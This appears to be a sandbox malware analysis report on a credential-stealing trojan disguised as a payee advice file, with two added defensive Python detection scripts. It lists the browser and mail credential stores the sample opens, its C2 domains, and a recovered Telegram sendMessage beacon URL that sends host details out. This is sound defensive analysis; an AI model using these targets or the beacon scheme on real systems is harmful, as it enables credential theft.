Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | API call chain: ExitProcess graph end node (graph_0-4799)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | API call chain: ExitProcess graph end node (graph_0-4801)
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

            Source: Yara matchFile source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR
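The file and registry accesses listed above are what a host-based detection should key on: no process other than the browser or mail client itself has a reason to open Chromium's Login Data, Cookies, Web Data, History or Top Sites files, the Postbox profile directory, or the Outlook MAPI profile key. The script below is an added example and not part of the Joe Sandbox report; it runs that check over a constructed event list modelled on the report's "File opened" / "Key opened" lines. The event schema (process, kind, path) and the allow-list of process names are assumptions to tune per environment.

```python
import ntpath
import re

# Added example, not part of the report. Store names the sample opened inside
# the Chromium "User Data" tree (History, Cookies, Web Data, Login Data, Top Sites).
CHROMIUM_STORES = {"history", "cookies", "web data", "login data", "top sites"}
CHROMIUM_USER_DATA = re.compile(
    r"\\(google\\chrome|microsoft\\edge)\\user data\\", re.IGNORECASE)

# Mail-client profile locations the sample touched (Postbox profile directory,
# Outlook MAPI profile key), lower-cased for substring matching.
MAIL_PROFILE_MARKERS = (
    "\\appdata\\roaming\\postboxapp\\profiles\\",
    "\\windows messaging subsystem\\profiles\\outlook\\",
)

# Processes that legitimately open their own stores. Assumption: tune per estate.
ALLOWED_PROCESSES = {"chrome.exe", "msedge.exe", "postbox.exe", "outlook.exe"}


def classify(event):
    """Return a short reason if the access looks like credential theft, else None.

    event: {"process": full image path, "kind": "file" | "registry", "path": str}
    """
    proc = ntpath.basename(event["process"]).lower()
    if proc in ALLOWED_PROCESSES:
        return None
    path = event["path"]
    low = path.lower()
    if event["kind"] == "file" and CHROMIUM_USER_DATA.search(path):
        if ntpath.basename(low) in CHROMIUM_STORES:
            return f"{proc} opened browser store {ntpath.basename(path)!r}"
    if any(marker in low for marker in MAIL_PROFILE_MARKERS):
        what = "registry key" if event["kind"] == "registry" else "profile directory"
        return f"{proc} opened mail {what}"
    return None


def scan(events):
    """Return [(process name, reason)] for every suspicious event, in input order."""
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason:
            hits.append((ntpath.basename(ev["process"]), reason))
    return hits


SAMPLE = "C:\\Users\\user\\Desktop\\PayeeAdvice_HK54912_R0038704_37504.exe"

# Constructed events: five taken from the report's own lines, plus two benign
# accesses (the browser reading its own store, Explorer opening a text file)
# that must not fire.
EVENTS = [
    {"process": SAMPLE, "kind": "file",
     "path": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"},
    {"process": SAMPLE, "kind": "file",
     "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"},
    {"process": SAMPLE, "kind": "file",
     "path": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"},
    {"process": SAMPLE, "kind": "file",
     "path": "C:\\Users\\user\\AppData\\Roaming\\PostboxApp\\Profiles\\"},
    {"process": SAMPLE, "kind": "registry",
     "path": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
             "Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"},
    {"process": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "kind": "file",
     "path": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"process": "C:\\Windows\\explorer.exe", "kind": "file",
     "path": "C:\\Users\\user\\Desktop\\notes.txt"},
]

if __name__ == "__main__":
    for proc, reason in scan(EVENTS):
        print(f"ALERT {proc}: {reason}")
```

Matching on the store file name inside a Chromium "User Data" tree, rather than on the literal paths in the report, also catches non-default profiles and other Chromium-based browsers installed under the same layout; the process allow-list is what keeps the rule quiet on a normal workstation.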

            Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR
MITRE ATT&CK matrix (techniques flagged by the report's signatures; the number in front of each technique is how many signatures mapped to it):

Execution: 1 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping
Discovery: 21 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 215 System Information Discovery
Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data
Command and Control: 1 Web Service; 21 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 24 Application Layer Protocol
Impact: 1 System Shutdown/Reboot

No technique was flagged under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration.
Antivirus detection

Source | Detection | Scanner | Label
PayeeAdvice_HK54912_R0038704_37504.exe | 32% | ReversingLabs | Win32.Trojan.GuLoader
PayeeAdvice_HK54912_R0038704_37504.exe | 100% | Avira | HEUR/AGEN.1331786

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll | 0% | ReversingLabs | -

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://fa3hwa.dm.files.1drv.com/ | 0% | Avira URL Cloud | safe
http://mail.foodex.com.pk | 0% | Avira URL Cloud | safe
https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4 | 0% | Avira URL Cloud | safe
https://fa3hwa.dm.files.1drv.com/WE | 0% | Avira URL Cloud | safe
https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGE | 0% | Avira URL Cloud | safe
https://fa3hwa.dm.files.1drv.com/ve | 0% | Avira URL Cloud | safe
https://api.oned | 0% | Avira URL Cloud | safe
http://foodex.com.pk | 0% | Avira URL Cloud | safe
Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | false | - | high
foodex.com.pk | 37.27.123.72 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | false | - | high
checkip.dyndns.com | 158.101.44.242 | true | false | - | high
mail.foodex.com.pk | unknown | unknown | true | - | unknown
api.onedrive.com | unknown | unknown | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
fa3hwa.dm.files.1drv.com | unknown | unknown | true | - | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/173.254.250.69 | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
http://checkip.dyndns.org/ | false | - | high
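The three contacted URLs form one chain: the sample learns its public IP from checkip.dyndns.org, resolves that IP to a country through reallyfreegeoip.org/xml/<ip>, and reports the machine name, timestamp and country in its first Telegram message (the bot token and chat_id are blank in the string the report recovered). Correlating the three stages per host inside a short window is a much tighter network detection than alerting on api.telegram.org alone, which plenty of legitimate bots use. The script below is an added example and not part of the report: it parses constructed proxy-log lines (the "timestamp host url" format and the host names are assumptions) modelled on these URLs, correlates the stages per source host, and decodes the leaked fields from the sendMessage text parameter.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the report. Constructed proxy log: the third line
# carries the report's Telegram URL verbatim; the last line is a lone, benign
# bot call that must not alert on its own.
LOG = """\
2024-11-17T01:14:05Z ws-473627 http://checkip.dyndns.org/
2024-11-17T01:14:06Z ws-473627 https://reallyfreegeoip.org/xml/173.254.250.69
2024-11-17T01:14:08Z ws-473627 https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
2024-11-17T01:20:00Z ws-000001 https://api.telegram.org/botXYZ/sendMessage?chat_id=1&text=build+ok
"""

# The chain, in the order the sample runs it.
STAGES = (
    ("external_ip", re.compile(r"^https?://checkip\.dyndns\.(?:org|com)/", re.I)),
    ("geolocate", re.compile(r"^https?://reallyfreegeoip\.org/xml/", re.I)),
    ("telegram_exfil", re.compile(r"^https?://api\.telegram\.org/bot[^/]*/sendMessage", re.I)),
)
STAGE_ORDER = tuple(name for name, _ in STAGES)


def stage_of(url):
    """Map a URL to the chain stage it belongs to, or None."""
    for name, rx in STAGES:
        if rx.match(url):
            return name
    return None


def parse_log(text):
    """Return [(datetime, host, url)] from 'ts host url' lines; blank lines skipped."""
    out = []
    for line in text.splitlines():
        if line.strip():
            ts, host, url = line.split(" ", 2)
            out.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, url))
    return out


def decode_beacon(url):
    """Pull the fields out of the Telegram beacon.

    The text parameter is CRLF-separated 'Key: value' lines followed by a
    bracketed free-text trailer, which is skipped. The bot token is the path
    segment after /bot.
    """
    parts = urlsplit(url)
    token = re.match(r"/bot([^/]*)/", parts.path)
    fields = {"bot_token": token.group(1) if token else ""}
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes for us
    fields["chat_id"] = qs.get("chat_id", [""])[0]
    for line in qs.get("text", [""])[0].replace("\r\n", "\n").split("\n"):
        if ":" in line and not line.lstrip().startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def correlate(events, window_seconds=120):
    """Return {host: decoded beacon} for hosts that ran all three stages, in
    order, within window_seconds. A Telegram call without the two lookups
    before it never alerts."""
    seen = {}
    alerts = {}
    for ts, host, url in sorted(events, key=lambda e: e[0]):
        stage = stage_of(url)
        if stage is None:
            continue
        seen.setdefault(host, {})[stage] = ts
        s = seen[host]
        if stage == "telegram_exfil" and all(name in s for name in STAGE_ORDER):
            ordered = [s[name] for name in STAGE_ORDER]
            if ordered == sorted(ordered) and (ordered[-1] - ordered[0]).total_seconds() <= window_seconds:
                alerts[host] = decode_beacon(url)
    return alerts


if __name__ == "__main__":
    for host, beacon in correlate(parse_log(LOG)).items():
        print(host, beacon)
```

The decoded PC Name and Country Name are the same values the report's URL carries, so the same function doubles as a quick triage helper for a captured beacon; on a real proxy feed the bot token recovered from the path is the pivot for finding other infected hosts reporting to the same operator.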
URLs from Memory and Binaries (source column: memory dumps of PayeeAdvice_HK54912_R0038704_37504.exe unless stated otherwise)

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | 00000004.00000002.3349133220.000000003767B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20a | 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://fa3hwa.dm.files.1drv.com/WE | 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.foodex.com.pk | 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp; 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.onedrive.com/ | 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | false | - | high
